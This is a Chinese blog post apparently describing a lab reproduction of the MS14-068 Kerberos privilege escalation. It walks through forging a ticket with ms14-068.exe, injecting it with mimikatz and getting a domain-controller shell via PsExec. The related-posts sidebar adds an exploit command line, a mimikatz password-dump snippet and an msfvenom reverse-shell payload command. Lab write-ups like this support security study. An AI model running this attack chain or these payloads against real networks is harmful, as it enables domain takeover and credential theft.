MS14_068域提权漏洞复现

最新推荐文章于 2024-04-04 09:40:01 发布
最新推荐文章于 2024-04-04 09:40:01 发布
阅读量708 收藏 7
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ninnjnjn/article/details/105242049
版权

MS14_068域提权漏洞复现

1.漏洞说明
该漏洞可能允许攻击者将未授权的域用户账户的权限,提权到域管理员的权限
2.漏洞原理
利用keberos协议中漏洞
简单说下kerberos协议,kerberos协议分为三个阶段:
第一阶段(1,2),认证服务交换,用户向认证服务器证明自己的身份,从认证服务器获得票据许可票据,完成了对购票用户的身份认证,以及发放购票许可证
第二阶段(3,4),票据许可服务交换,用户向票据许可服务器TGS索取访问服务器的服务许可票据,完成了票据的发放与用户和服务器之间的会话密钥的交换
第三阶段(5,6),用户域服务器双向认证,使用所需服务
在这里插入图片描述

3.漏洞利用前提
(1)域控主机没有打MS14_068的补丁
(2)攻击者拿下了一台域内主机的普通计算机,并获得普通域用户名以及密码/hash值,和用户的suid

4.实验环境
域控主机windows 2008R2 192.168.164.55
域内主机windows 7 192.168.164.58
MS14_068.exe程序
mimikatz工具
5.漏洞利用
首先在域控主机检查是否有MS14_068这个漏洞,通过查看是否打补丁(KB3011780)来判断是否MS14_068相关漏洞补丁
在这里插入图片描述在这里插入图片描述没有KB3011780则没有相关补丁

测试权限:在域中的子主机(win7)中访问域主主机(win2008 r2)的C盘
输入

dir \\计算机全名\c$

在这里插入图片描述在这里插入图片描述
提示:拒绝访问
则没有权限

利用猕猴桃(mimikatz)查看已有kerberos票据,并清空该票据
查看票据
在这里插入图片描述
清除票据
在这里插入图片描述查看域子主机的用户id
在这里插入图片描述利用ms14_068.exe提权工具生成伪造的kerberos协议认证证书
在最后一行显示了新生成的票据(TGT_zzy@zxy.com.ccache)
在这里插入图片描述将新生成的票据添加到Kerberos协议中
在这里插入图片描述检验
先在在域主主机(win2008r2)的c盘中添加test文件
在这里插入图片描述再在win7的主机查看
在这里插入图片描述可以进入到域主主机的c盘,且看到test文件,提权成功
利用PsExec.exe获取域主主机的shell,并且是管理员权限
在这里插入图片描述
大致思路:
1.目标是否有ms14_068漏洞
2.利用ms14_068.exe生成票据
3.使用mimikatz清空原有票据,注入伪造票据
4.使用PsExec获取最高管理员的shell

嗯嗯,好的
关注
  • 0
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
提权MS14-068
good good study
03-17 4663
目标:普通成员——>管理员 漏洞利用前提 域控没有打MS14-068的补丁(KB3011780) 拿下一台加入的计算机 有这台内计算机的用户密码和Sid 漏洞复现 环境: win2012(192.168.10.2) 域控,开启了防火墙 win7(192.168.10.5),成员 1. win7获取账户的密码及sid值 win7机器上查看管理员,可发现,并没有自己 这里使用mimikatz去抓取用户的明文密码 mimikatz.exe "privilege:....
MS14-068提权漏洞复现
weixin_50985113的博客
06-29 723
这里便用到了我们之前所讲到的 PAC 这个东西,PAC 是用来验证 Client 的访问权限的,它会被TGT 里发送给 Client,然后由 Client 发送给 TGS。但也恰恰是这个 PAC 造成了 MS14-068 这个漏洞。该漏洞是位于 kdcsvc.dll 域控制器的密钥分发中心(KDC)服务中的 Windows 漏洞,它允许经过身份验证的用户在其获得的票证 TGT 中插入任意的 PAC。普通用户可以通过呈现具有改变了 PAC 的 TGT 来伪造票据获得管理员权限。
探秘ZeroLogon:Windows域控安全漏洞的克星
最新发布
gitblog_00088的博客
04-04 429
探秘ZeroLogon:Windows域控安全漏洞的克星 项目地址:https://gitcode.com/Rvn0xsy/ZeroLogon 零日攻击(Zero-Day)是网络安全领的一种严重威胁,而ZeroLogon则是2020年发现的一个影响Windows域控制器的重大漏洞。本文将深入探讨ZeroLogon项目,这是一个开源工具,旨在帮助系统管理员检测并修复此漏洞。 项目简介 ZeroLo...
Windows域控常见0day及利用漏洞汇集
Ms08067安全实验室
01-10 2513
本文对近几年出现的Windows域控相关漏洞及利用方法进行整理,方便检测存在的漏洞,目前来看主要集中在本地权限提升、打印机服务利用、exchange等。 1.1Kerberos 校验和漏洞MS14-068(CVE-2014-6324) Microsoft Windows Server 2003 SP2、Windows Vista SP2、Windows Server 2008...
复现MS14-068
这里是Y.lin的博客,目前是一名网络安全专业的学生,希望和师傅们一起进步吧!
05-23 500
MS14-068
MS14-068漏洞复现
一纸荒芜的博客
08-26 3197
ms14-068漏洞复现
MS14-068AD提权神器
05-24
1.python.exe ms14-068.py -u user-a-1@dom-a.loc -s S-1-5-21-557603841-771695929-1514560438-1103 -d dc-a-2003.dom-a.local user-a-1@dom-a.loc位用户 S-1-5-21-557603841-771695929-1514560438-1103 为账号...
ms14-068.exe内神器
11-25
ms14-068.exe内神器
pykek-ms14-068.zip
01-06
pykek-ms14-068.zip
python实验一 使用KALI进行MS17_010渗透提权
04-09
华东交通大学网络安全软件开发python实验一
永恒之蓝ms17_010方程式漏洞利用工具.rar
12-03
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.***.*** LPORT=4**** -f dll > x64.dll,reverse或者bind方式,替换到目录下,执行第一个检测安装backdoor,第二个选项卡attack就可以了。...
MS14-068渗透
bailandawang123的博客
03-10 408
ms14068主要是通过伪造管的tgt,将普通用户提升为管用户,从而控制域控
Windows提权漏洞CVE-2022-26923分析与复现
C20220511的博客
06-24 3193
当Windows系统的Active Directory证书服务(CS)在上运行时,由于机器账号中的dNSHostName属性不具有唯一性,中普通用户可以将其更改为高权限的域控机器账号属性,然后从Active Directory证书服务中获取域控机器账户的证书,导致中普通用户权限提升为管理员权限。这一漏洞最早由安全研究员Oliver Lyak发现并公开分析过程和POC,微软在2022年5月的安全更新中对其进行了修补。...
【权限提升】WIN系统&AD域控&NetLogon&ADCS&PAC&KDC&CVE漏洞
今天是几号的博客
03-06 659
CVE-2020-1472是继MS17010之后好用的NetLogon特权域控提权漏洞,影响Windows Server 2008R2至Windows Server 2019的多个版本系统,只要攻击者能访问到目标域控井且知道域控计算机名即可利用该漏洞.该漏洞不要求当前计算机在内,也不要求当前计算机操作系统为Windows.#WIN-域控提权-CVE-2022-26923。Kali添加访问内信息 /etc/hosts。1、需要用户账号密码。2、内存在证书服务器。1、一个内普通账号。
kali linux 渗透测试之内网渗透
05-02
理论加实战结合,学习后具备自动化批量控制内网主机的能力,具备安全工程师岗位的基本能力。专注培养高薪网络安全人才,帮助大家了解并学习网络安全,传授黑白帽实战技能,带领零基础小白正式踏入入门阶段。
【CVE-2021-42287/CVE-2021-42278 Windows提权漏洞分析】
mingyqf的博客
04-14 3102
转发至:安全客 https://www.anquanke.com/post/id/263910 CVE-2021-42287/CVE-2021-42278 Windows提权漏洞分析 ​ 阅读量 76400 ​ 分享到:
漏洞权限管理-域控制器告警
ITmoster的博客
11-13 357
最近的 Zerologon漏洞(CVE-2020-1472)成了特权提升漏洞的头条新闻,它可能会影响组织中的所有计算机和域控制器。 这个被称为Zerologon的高风险漏洞使威胁者可以轻松即时地访问域控制器,而无需提供任何其他特权。这种攻击甚至不需要对用户进行身份验证;威胁者甚至只需要连接到内部网络即可。 什么是Zerologon漏洞? 这是Netlogon中的一个漏洞,该身份验证协议用于验证加入的计算机对域控制器的身份。它被归类为高风险(CVSS评分为10),因此该漏洞意味着泄露用户帐户甚至不需要向
Kerberos KDC权限提升漏洞总结
m0_38103658的博客
04-13 879
Kerberos KDC权限提升漏洞总结 0x00 漏洞起源 Windows Kerberos对kerberos tickets中的PAC(Privilege Attribute Certificate)的验证流程中存在安全漏洞,低权限的经过认证的远程攻击者利用该漏洞可以伪造一个PAC并通过Kerberos KDC(Key Distribution Center)的验证,攻击成功使得攻击者可以提...
提权神器 MS14-068 完整EXP
shaolj666的博客
10-11 594
提权: 会提权的兄弟应该都知道 的权限是整个局网最高统治权 当我们拿下一台服务器 只是下的一台机器 这时候 就会想尽办法 拿下域控制服务器 不知道的可看本博客之前做的教程 可以让任何内用户提升为管理员 使用命令: c:\python27\python.exe ms14-068.py -u k8test3@k8.local -p k8team!@# -s S-1-5-21-4191298166-3247023184-3514116461-1110 -d K8DNS.k8.local mimikatz
永恒之蓝ms17_010漏洞复现实验
01-03
很抱歉,根据提供的引用内容,我无法提供关于永恒之蓝MS17-010漏洞复现实验。这是因为复现漏洞需要特定的环境和设备,并且涉及到非法活动。我强烈建议您不要尝试复现漏洞,以免违法和造成不必要的损失。 如果...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值